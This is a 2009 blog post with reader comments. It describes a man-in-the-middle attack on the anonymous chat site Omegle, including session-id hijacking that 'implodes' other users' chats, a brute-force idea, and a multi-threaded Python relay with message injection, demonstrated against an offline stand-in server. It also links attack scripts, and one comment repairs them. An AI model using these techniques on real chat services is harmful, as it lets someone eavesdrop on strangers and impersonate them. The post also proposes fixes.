Saturday, November 14, 2009

Omegle.com Man In The Middle Attack

The other day my friend showed me this site Omegle. It's a pretty cool site that anonymously pairs you with a 'stranger' for a one-on-one chat, with the ability to disconnect and find a new 'stranger' at any time. It's surprisingly addictive and fun. It claims to be completely anonymous, so to check this I fired up Wireshark and took a look at what information was getting passed to the server. I was surprised to find the method of communication extremely simple and completely unencrypted: the whole chat is a handful of plain HTTP POST requests, with a session id as the only thing identifying you. When you connect to a person the process looks like this:

You: POST omegle.com/start
Omg: HTTP "123456" <-- random 6-character id (a-z A-Z 0-9 _ -), the only credential you ever get
You: POST omegle.com/events?id=123456
Omg: HTTP [["connected"]]
You: POST omegle.com/send?msg=hello&id=123456
Omg: HTTP win <-- funny
You: POST omegle.com/events?id=123456
Omg: HTTP [["gotMessage", "hey"]] <-- message from other person
...
You: POST omegle.com/disconnect?id=123456 <-- quit the chat


Seeing this immediately sparked some thought. Can I request events for other users? Can I send messages to other users? Can I disconnect other users? It seemed all you needed to do was post the command with the user id you wanted to act on, since the id is the only credential and nothing ties it to the connection that created it. As it turns out it's almost even better. If you post for events using someone else's user id it will "implode" their chat:

Screenshot


What's better is that the other person is still connected and has no idea that their 'stranger' has been imploded. Now you can keep talking to them and they have no idea what just happened.

There is one major problem with this however. According to:

http://omegle.com/count

there are on average only about 3k users online at a given time, but the number of possible user ids is

(26+26+10+1+1)^6 = 68,719,476,736

That is a terrible chance of finding anyone quickly: with about 3k live ids in a space of roughly 68.7 billion, you would expect one hit per 23 million or so guesses. I actually started writing a brute forcer (omegle_brute_force.py) but quickly realized that this was an ill-fated attempt.

So if you can't find the users, why not have the users come to you? I realized that Omegle would be a prime target for a classic man-in-the-middle attack. The idea is super simple: I connect to two strangers just like normal, but instead of me talking to them, they talk to each other through me. As long as I don't inject any messages or do anything weird they should have no idea that I'm even there. Here is how the program looks:

omegle


As you can see, I have a legitimate connection to both client 1 and client 2, but I transparently pass their messages through me to the other person.

Doing this was kind of tricky. A POST to /events is a long poll: it blocks until the server has an event to hand back. This means that with a single-threaded program each person would have to take turns talking, since the program would block every time I polled for one side's messages. Even most two-threaded setups have the same problem, because a thread stuck in a poll can't also send. The solution I came up with works pretty well. There are four threads in total:

1) Sending to client 1
2) Receiving from client 1
3) Sending to client 2
4) Receiving from client 2

Every time a receive thread gets a message it puts it on a queue (first in, first out, so each side sees the other's lines in the order they were typed) for the matching send thread to work through at its leisure. The result? It doesn't matter if a POST blocks, because only the thread that issued it waits: that side's sender can keep working through its queue and the other pair of threads can keep sending and receiving.
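As an added example (not one of the scripts linked below and not Omegle's own code), here is the /start, /events, /send, /disconnect exchange and the four-thread relay from the two passages above, written for Python 3 against a constructed in-memory stand-in for omegle.com so it runs offline. The ids "aaaaaa", "bbbbbb", "s1" and "s2", the event name "strangerDisconnected" and what a poll returns after you quit your own session are assumptions, since the post only shows "connected" and "gotMessage". It also shows the injection possibility discussed further down: a line the relay queues itself reaches one stranger looking as if the other had typed it.

```python
import queue
import threading


class FakeOmegle:
    """Constructed stand-in for omegle.com: /events long-polls, /send goes to the partner."""

    def __init__(self):
        self._inbox = {}    # id -> queue.Queue of pending events for that id
        self._partner = {}  # id -> id of the paired stranger
        self._gone = set()  # ids that have disconnected

    def pair(self, id_a, id_b):
        """Pair two ids, as if both had POSTed /start and been matched."""
        for uid in (id_a, id_b):
            self._inbox[uid] = queue.Queue()
            self._inbox[uid].put(["connected"])
        self._partner[id_a], self._partner[id_b] = id_b, id_a

    def events(self, uid):
        """POST /events?id=<uid>: block until one event is available."""
        return self._inbox[uid].get()

    def send(self, uid, msg):
        """POST /send?msg=<msg>&id=<uid>: deliver msg to uid's partner."""
        self._inbox[self._partner[uid]].put(["gotMessage", msg])
        return "win"

    def disconnect(self, uid):
        """POST /disconnect?id=<uid>: notify the partner, end uid's own poll."""
        self._gone.add(uid)
        if self._partner[uid] not in self._gone:
            # event name assumed; the post only shows "connected" and "gotMessage"
            self._inbox[self._partner[uid]].put(["strangerDisconnected"])
        self._inbox[uid].put(["disconnected"])  # assumed: poll returns once you quit

    def messages_seen_by(self, uid):
        texts = []  # what that stranger's screen showed so far
        while not self._inbox[uid].empty():
            event = self._inbox[uid].get_nowait()
            if event[0] == "gotMessage":
                texts.append(event[1])
        return texts


class Relay:
    """Two legitimate sessions; each receiver feeds the *other* session's sender.
    Only the thread in a blocking /events POST waits; FIFO queues keep message order."""

    def __init__(self, server, id_one, id_two):
        self.server = server
        self.id_one, self.id_two = id_one, id_two
        self.outgoing = {id_one: queue.Queue(), id_two: queue.Queue()}

    def _receiver(self, my_id, other_id):
        while True:
            event = self.server.events(my_id)  # blocks; only this thread waits
            if event[0] == "gotMessage":
                self.outgoing[other_id].put(event[1])
            elif event[0] in ("strangerDisconnected", "disconnected"):
                self.outgoing[other_id].put(None)  # sentinel: tear the other side down
                return

    def _sender(self, my_id):
        while True:
            msg = self.outgoing[my_id].get()
            if msg is None:
                self.server.disconnect(my_id)
                return
            self.server.send(my_id, msg)

    def inject(self, target_id, msg):
        """Queue our own line; target's stranger sees it as if the other side typed it."""
        self.outgoing[target_id].put(msg)

    def start(self):
        jobs = [(self._receiver, (self.id_one, self.id_two)),
                (self._receiver, (self.id_two, self.id_one)),
                (self._sender, (self.id_one,)), (self._sender, (self.id_two,))]
        threads = [threading.Thread(target=f, args=a, daemon=True) for f, a in jobs]
        for t in threads:
            t.start()
        return threads


def run_demo():
    """Constructed scenario: s1 and s2 think they are paired; the relay sits between."""
    server = FakeOmegle()
    server.pair("aaaaaa", "s1")  # relay session one <-> stranger 1 (ids assumed)
    server.pair("bbbbbb", "s2")  # relay session two <-> stranger 2
    relay = Relay(server, "aaaaaa", "bbbbbb")
    threads = relay.start()
    relay.inject("bbbbbb", "hi from relay")  # s2 will attribute this to s1
    server.send("s1", "hello")
    server.send("s2", "hey")
    server.send("s1", "asl?")
    server.send("s2", "gotta go")
    server.disconnect("s2")  # s2 leaves; the relay tears both sessions down
    for t in threads:
        t.join(timeout=5)
    return server.messages_seen_by("s2"), server.messages_seen_by("s1")
```

Calling run_demo() returns (['hi from relay', 'hello', 'asl?'], ['hey', 'gotta go']): everything s1 typed reached s2 in order (plus the injected line), everything s2 typed reached s1, and when s2 quit the relay closed both sessions so s1 saw an ordinary "stranger disconnected". Against the real site the two classes would be replaced by http.client requests carrying the id, and the fake's delivery after a disconnect is a simplification the real server would not make.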

A classic man in the middle attack:

Screenshot-2

This has some interesting possibilities. I can send messages to one of the clients on the other's behalf and the person will have no idea that I sent it. Also, what about connecting more than 2 people together? There is no reason I couldn't connect multiple people together in a chat and maybe even append a user tag to each of their messages.

Omegle is a pretty interesting site, and you have to hand it to Leif K-Brooks for (apparently) single-handedly making such a popular site at only 18. I hope he can add some needed security to Omegle to prevent this kind of attack in the future. The implode trick is the fixable part: the server acts on any id it is handed, so binding an id to the session that obtained it would close it. The relay is harder, because an anonymous chat gives the two strangers nothing with which to verify each other; the most the site can do is make mass relaying expensive and encrypt the transport so that a network observer can't read the chats in the first place.

Download my programs here [mirror].

omegle_man_in_middle.py - program described above
omegle_brute_force.py - attempts to guess user ids and post for events
omegle_class.py - generic class for interacting with omegle
omegle_connect_view.py - connect to omegle and posts for events
omegle_multi_connect.py - connects to multiple people at once. proof of concept that multi connections can be made
omegle_send.py - send messages using a user id

EDIT:

Found another omegle man in the middle attack written in perl [here]

15 comments:

  1. very very interesting, great article

  2. Hi, it seems the link to your Python scripts doesn't work anymore :( Could you please reupload it?

  3. @anon

    Sorry, I don't know what's going on with my school's hosting. I put up a mirror.

  4. Thanks for the quick reaction ;) but... I don't know if the problem is with my connection... it throws HTTP 101 ERR_CONNECTION_RESET on that mirror :(

  5. @anon

    Oops! Sorry, I had the wrong port in the link. Try it now, it should be good.

  6. Thanks a lot man... I was trying to make a JS web client which would connect to Omegle and have these nice features... but it looks like I'm stuck with the limitation that XMLHttpRequests can only be sent to your own domain... maybe I'll solve it... dunno :) but for now I'm giving up I guess...

  7. really great and useful article , Keep up the good work ;-)

  8. Max
    Omegle has changed slightly and the scripts are broken.
    I fixed omegle_man_in_middle.py thus:


    params_start = urlencode({'rcs':"1",'spid':''})
    con_one.request("POST", "/start", params_start, headers)
    con_two.request("POST", "/start", params_start, headers)

    I don't know if those parameters were ever used on Omegle before, but they are necessary now. The site has added a video chat feature; this may be the reason.

    Also note that a GET request to start also returns an ID; so you could just use

    con_one.request("GET", "/start", 0, headers)

    etc

  9. Hey, very informative article. I was on Omegle and some son of a bitch found out my Facebook username. Any idea how they did that? Is it even possible, theoretically? Or am I more likely dealing with a script kiddie who I personally know and who has a grudge against me?

  10. The SOB didn't really find out your username, though it can rattle your nerves when they do that! I spent a bit of time looking into the possibilities, and unlike Chatroulette (which does connect users directly and thus exposes your outward-facing IP address), all communication on Omegle is between you and Omegle's system. There isn't anything that you don't type that the person on the other end can get.

    As for how it was done, it's an 'exploit' of the fact that if a user (you in this case) is logged into Facebook in another tab, in the same browser, and selects a link of the form

    http://www.facebook.com/profile.php?id=2018293050400

    Facebook will present the user's own profile page. If the user is not logged into Facebook, then the login page is displayed. Everything from the question mark to the right is fluff that is ignored, but it makes it look like the person found a legitimate link.

    Rest easy and know that your computer wasn't accessed (this time). In general, it's just as risky to click on links that are sent to you via omegle as it would be to click on something sent to you in an email.

    Have a great day!

  11. Similar idea; http://kitakitsune.org/texty/rc0d3z/omegleProxy.html

  12. Do you know of an Omegle chat script for developing a chat website?

  13. I wonder if you fixed your script for their new updates?

  14. Was wondering the same thing :P Just discovered this. I found the problem wasn't connecting or receiving messages, it was passing them "through" me to the opposite user. What happens is I receive all the messages but the other person never receives his/her reply. I may fix this myself if you wouldn't mind.

  15. Dear Bear24rw,
    I think you should consider using apostrophes in your contributions. They would make you appear a lot more intelligent.
